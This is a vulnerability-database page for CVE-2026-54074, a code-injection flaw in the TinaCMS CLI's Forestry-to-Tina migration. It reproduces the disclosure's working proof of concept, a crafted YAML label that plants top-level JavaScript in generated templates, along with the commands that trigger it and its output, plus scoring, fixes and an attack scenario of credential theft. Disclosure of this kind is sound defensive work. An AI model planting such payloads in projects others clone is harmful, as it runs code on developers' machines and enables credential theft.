Skip to main content

TinaCMS CLI CVE-2026-54074

| EUVDEUVD-2026-41142 HIGH
Code Injection (CWE-94)
2026-06-19 https://github.com/tinacms/tinacms GHSA-4936-9hrh-qqpw
7.8
CVSS 3.1 · Vendor: https://github.com/tinacms/tinacms
Share

Severity by source

Vendor (https://github.com/tinacms/tinacms) PRIMARY
7.8 HIGH
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
vuln.today AI
7.8 HIGH

Payload delivered via local cloned repo and executes during local dev/build, so AV:L; no auth needed (PR:N), but victim must run init and accept migration prompt then dev/build (UI:R); arbitrary code as user yields C/I/A:H.

3.1 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
4.0 AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (https://github.com/tinacms/tinacms).

CVSS VectorVendor: https://github.com/tinacms/tinacms

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector
Local
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 19, 2026 - 23:32 vuln.today
Analysis Generated
Jun 19, 2026 - 23:32 vuln.today
CVE Published
Jun 19, 2026 - 21:15 github-advisory
HIGH 7.8

DescriptionCVE.org

Description

Summary

@tinacms/cli contains a Remote Code Execution vulnerability in its Forestry-to-Tina migration command. The internal helper addVariablesToCode unquotes any value matching the marker "__TINA_INTERNAL__:::(.*?):::" inside the stringified collection JSON. User-supplied label and name fields from .forestry//*.yml are placed into that JSON without any sanitisation. An attacker who controls a Forestry-style project can therefore inject arbitrary JavaScript into the generated tina/templates.{ts,js} file. The injected code is written at module top level, so it executes the moment the developer runs tinacms dev or tinacms build**, with the developer's privileges.

Details

Vulnerable code path:

  1. packages/@tinacms/cli/src/cmds/forestry-migrate/util/index.ts
  • transformForestryFieldsToTinaFields() writes forestryField.label

(and .name) straight into TinaField objects (no sanitisation).

  1. packages/@tinacms/cli/src/cmds/forestry-migrate/util/codeTransformer.ts,

lines 16-22 - the regex-based unquoter:

ts
   export const addVariablesToCode = (codeWithTinaPrefix: string) => {
     const code = codeWithTinaPrefix.replace(
       /"__TINA_INTERNAL__:::(.*?):::"/g,
       '$1'
     );
     return { code };
   };
  1. codeTransformer.ts lines 80-88 - the field array is

JSON.stringify-ed and then handed to addVariablesToCode. Because JSON.stringify does not escape single quotes or backticks, an attacker who avoids " in the payload survives the JSON pass intact.

  1. packages/@tinacms/cli/src/cmds/init/apply.ts lines 110-116 - the

resulting string is written to tina/templates.{ts,js} and imported by the generated tina/config.{ts,js}, which tinacms dev evaluates.

Why it executes immediately: the regex unquoting allows the attacker's payload to *close the surrounding object/array and the enclosing xxxFields() function*, drop a top-level IIFE, and then start a dummy function that swallows the trailing JSON. The IIFE is at module scope, so it runs the instant tina/config.ts imports ./templates.

PoC

End-to-end verified against tinacms and @tinacms/cli@2.3.1, built from commit ae1ab5d0f of tinacms/tinacms on Windows 11 + Node.js v24 (behaviour is identical on Node 22).

Step 1 - attacker prepares a malicious Forestry project

.forestry/settings.yml

yaml
---
new_page_extension: md
auto_deploy: false
admin_path: ''
webhook_url: ''
sections:
- type: directory
  path: content/posts
  label: Posts
  create: all
  match: "**/*.md"
  templates:
  - rce

.forestry/front_matter/templates/rce.yml

yaml
---
label: rce_template
fields:
- name: title
  type: text
  label: "__TINA_INTERNAL__:::1}] }; (function(){ const fs=require('fs'); const os=require('os'); fs.writeFileSync(require('path').join(os.tmpdir(),'PWNED_PROOF.txt'), 'RCE triggered on ' + os.hostname() + ' at ' + new Date().toISOString()); console.log('=== RCE SUCCESSFUL ==='); })(); function _ignore_(){ return [{x:1:::"

> Note on payload encoding. The original disclosure draft used double > quotes inside the payload (console.log("RCE")). JSON.stringify escapes > those to \", which makes the generated TypeScript syntactically invalid > and is rejected by Prettier before the file is written. Using single > quotes or backticks for the inner string literals is required for the > exploit to succeed.

Step 2 - victim runs the standard onboarding flow

bash
git clone <attacker repo>
cd <attacker repo>
npx tinacms init
# accepts the "migrate Forestry templates?" prompt
npx tinacms dev
# OR: npx tinacms build

Step 3 - generated tina/templates.ts (verbatim, from a clean run)

ts
import type { TinaField } from "tinacms";
export function rce_templateFields() {
  return [{ type: "string", name: "title", label: 1 }];
}
(function () {                                          // <-- TOP-LEVEL IIFE
  const fs = require("fs");
  const os = require("os");
  fs.writeFileSync(
    require("path").join(os.tmpdir(), "PWNED_PROOF.txt"),
    "RCE triggered on " + os.hostname() + " at " + new Date().toISOString()
  );
  console.log("=== RCE SUCCESSFUL ===");
})();
function _ignore_() {
  return [{ x: 1 }] as TinaField[];
}

Step 4 - observed result

$ npx tinacms dev --noTelemetry --no-server
🦙 TinaCMS Dev Server is initializing...
=== RCE SUCCESSFUL ===
Cannot read properties of undefined (reading 'publicFolder')

$ cat "$TEMP/PWNED_PROOF.txt"
RCE triggered on <hostname> at 2026-05-23T06:57:29.800Z

The = RCE SUCCESSFUL = line is printed before the dev server fails on the (intentionally minimal) config, proving the malicious code executed during config evaluation.

Impact

  • Class: Remote Code Execution (code injection into a generated source

file that is automatically executed by the dev server/build).

  • Attack vector: Any developer who runs tinacms init on a Forestry

project they did not author (e.g. a starter template, a community fork, a "convert my site to Tina" service, an evaluation of a third-party CMS migration) and then runs tinacms dev or tinacms build.

  • Privileges obtained: Full execution under the developer's user

account. Practical consequences include:

  • Exfiltration of environment variables, .env files, SSH keys,

~/.aws/credentials, ~/.npmrc tokens, ~/.config/gh/hosts.yml.

  • Source-code modification (planting backdoors before the developer's

next commit / publish).

  • Supply-chain abuse via the developer's npm publish and git push

credentials.

  • Persistence via shell rc files or scheduled tasks.
  • Authentication: None required from the attacker.
  • User interaction: Required - victim must run the migration and then

the dev/build command. The migration prompt defaults to "yes".

Suggested Remediation

Either fix is sufficient; Option B is preferred because it is structurally impossible to bypass and does not silently drop user content.

Option A - sanitise user-controlled strings (the disclosure draft's proposal)

ts
// packages/@tinacms/cli/src/cmds/forestry-migrate/util/index.ts
const sanitizeString = (str: unknown): unknown =>
  typeof str === 'string'
    ? str.replace(/__TINA_INTERNAL__:::/g, '')
    : str;

Apply to every user-controlled string that flows into a TinaField object - at minimum forestryField.label, forestryField.name, forestryField.template, forestryField.config.options[*], forestryField.config.source.section, and the equivalents on nested fields/template_types recursive paths.

Option B - change the marker to a sequence that cannot survive JSON.stringify of user data

ts
// codeTransformer.ts
const MARKER_OPEN  = '__TINA_INTERNAL__';
const MARKER_CLOSE = '/__TINA_INTERNAL__';

export const addVariablesToCode = (s: string) => ({
  code: s.replace(
    new RegExp(`"${MARKER_OPEN}(.*?)${MARKER_CLOSE}"`, 'g'),
    '$1'
  ),
});

JSON.stringify escapes  to the six-character sequence , so any literal control character supplied via YAML can never reconstruct the marker. The internal callers (makeFieldsWithInternalCode) keep emitting real  bytes, so the legitimate flow continues to work and no user content is silently mutated.

Defence-in-depth

Regardless of which option ships, the migration code should also:

  • Reject forestryField.label / .name that contain newlines or NUL

bytes (Forestry never produced them).

  • Wrap the eventual prettier.format(...) call so that if formatting

fails the build aborts (today an exception is propagated, which is good - keep it that way).

---

Credit

Reported by AnGrY-Althaf (angry.althaf@gmail.com).

End-to-end PoC executed locally against tinacms@2.3.1 / @tinacms/cli@2.3.1 built from commit ae1ab5d0f of https://github.com/tinacms/tinacms.

AnalysisAI

Code injection in @tinacms/cli versions prior to 2.4.3 allows an attacker who controls a Forestry-style project to achieve remote code execution on a developer's workstation when the tinacms init Forestry migration runs and the developer subsequently executes tinacms dev or tinacms build. The addVariablesToCode helper unquotes any value matching the marker __TINA_INTERNAL__:::(.*?)::: placed in a stringified collection JSON, and user-supplied label/name fields from .forestry//*.yml are inserted into that JSON without sanitisation, yielding a top-level IIFE in the generated tina/templates.ts. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Publish malicious Forestry repo
Delivery
Victim clones project
Exploit
Victim runs tinacms init and accepts migration
Install
Sentinel payload written into tina/templates.ts
C2
Victim runs tinacms dev/build
Execute
Top-level IIFE executes as developer
Impact
Credential theft and supply-chain pivot

Vulnerability AssessmentAI

Exploitation Exploitation requires three concrete conditions to all hold: (1) the victim must clone or otherwise place an attacker-controlled project tree on disk that contains a `.forestry/` directory with malicious `label` or `name` fields in `.forestry/**/*.yml` (typically `.forestry/front_matter/templates/*.yml`); (2) the victim must invoke `tinacms init` and accept the 'migrate Forestry templates?' interactive prompt (which defaults to yes, so passive acceptance is enough); and (3) the victim must subsequently run `tinacms dev` or `tinacms build`, which evaluates the generated `tina/config.{ts,js}` and thereby loads the poisoned `tina/templates.{ts,js}`. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The vendor CVSS 3.1 vector (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H = 7.8 High) accurately captures the local-but-unauthenticated, user-interaction-gated nature: code only fires after the developer clones a malicious project, accepts the default-yes Forestry migration prompt in `tinacms init`, and then runs `dev`/`build`. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker publishes a 'TinaCMS starter' or 'Forestry-to-Tina migration helper' repository whose `.forestry/front_matter/templates/rce.yml` contains a `label:` field with the disclosed `__TINA_INTERNAL__:::…:::` payload wrapping a Node `require('fs')`/`require('child_process')` IIFE. A developer evaluating the starter runs `git clone`, `npx tinacms init` (accepting the default-yes Forestry-migration prompt), then `npx tinacms dev`; the generated `tina/templates.ts` is imported by `tina/config.ts` and the IIFE fires immediately, exfiltrating `~/.npmrc`, `~/.aws/credentials`, and `.env` to the attacker before the dev server even finishes booting. …
Remediation Vendor-released patch: upgrade @tinacms/cli to 2.4.3 or later (`npm install @tinacms/cli@^2.4.3` / `pnpm up @tinacms/cli@2.4.3`), shipped via PR https://github.com/tinacms/tinacms/pull/7006 and commit https://github.com/tinacms/tinacms/commit/77665ae73dd4f9563d339535e76fa811a8abdfbb, with full details in advisory https://github.com/tinacms/tinacms/security/advisories/GHSA-4936-9hrh-qqpw. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all development systems and team members using @tinacms/cli versions before 2.4.3; flag any Forestry projects with recent modifications. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Share

CVE-2026-54074 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy